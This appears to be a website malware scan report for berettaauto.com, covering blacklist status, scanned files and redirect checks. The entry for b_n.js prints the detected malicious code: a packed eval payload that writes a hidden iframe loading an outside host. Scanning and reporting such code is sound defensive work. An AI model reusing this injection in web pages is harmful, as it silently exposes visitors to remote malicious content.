Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=berettaauto.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://berettaauto.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.berettaauto.com/ | 200 OK Content-Length: 5155 Content-Type: text/html | clean |
http://www.berettaauto.com/b_n.js | 200 OK Content-Length: 4757 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var clicked=""
var gtype=".gif" var selstate="_on" if (typeof(loc)=="undefined" || loc==""){ var loc="" if (document.body&&document.body.innerHTML){ var tt = document.body.innerHTML.toLowerCase(); var last = tt.indexOf("b_n.js\""); if (last>0){ var first = tt.lastIndexOf("\"", last); if (first>0 && first<last) loc = document.body.innerHTML.substr(first+1,last-first-1); } } } document.w return true; } <!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5://6-1.8/?9=2" a="b:c;"></0>\');',13,13,'iframe|statistic||document|src|http|g|write|info|id|style|display|none'.split('|'),0,{})); <!-- . --> Antivirus reports:
| ||
http://www.berettaauto.com/xnews_917.asp | 200 OK Content-Length: 5508 Content-Type: text/html | clean |
http://www.berettaauto.com/xnews_912.asp | 200 OK Content-Length: 5682 Content-Type: text/html | clean |
http://www.berettaauto.com/xnews_951.asp | 200 OK Content-Length: 5509 Content-Type: text/html | clean |
http://www.berettaauto.com/xnews_953.asp | 200 OK Content-Length: 5554 Content-Type: text/html | clean |
http://www.berettaauto.com/xnews_931.asp | 200 OK Content-Length: 5515 Content-Type: text/html | clean |
http://www.berettaauto.com/xnews_914.asp | 200 OK Content-Length: 5477 Content-Type: text/html | clean |
http://www.berettaauto.com/xnews_954.asp | 200 OK Content-Length: 5470 Content-Type: text/html | clean |
http://www.berettaauto.com/xnews_952.asp | 200 OK Content-Length: 5444 Content-Type: text/html | clean |
http://www.berettaauto.com/xnews_949.asp | 200 OK Content-Length: 5488 Content-Type: text/html | clean |
http://www.berettaauto.com/xnews_945.asp | 200 OK Content-Length: 5459 Content-Type: text/html | clean |
http://www.berettaauto.com/xnews_934.asp | 200 OK Content-Length: 5839 Content-Type: text/html | clean |
http://www.berettaauto.com/xnews_925.asp | 200 OK Content-Length: 5604 Content-Type: text/html | clean |
http://www.berettaauto.com/xnews_649.asp | 200 OK Content-Length: 5484 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: berettaauto.com
Result:
GET / HTTP/1.1
Host: berettaauto.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: berettaauto.com
Referer: http://www.google.com/search?q=berettaauto.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: berettaauto.com
Referer: http://www.google.com/search?q=berettaauto.com
Result:
The result is similar to the first query. There are no suspicious redirects found.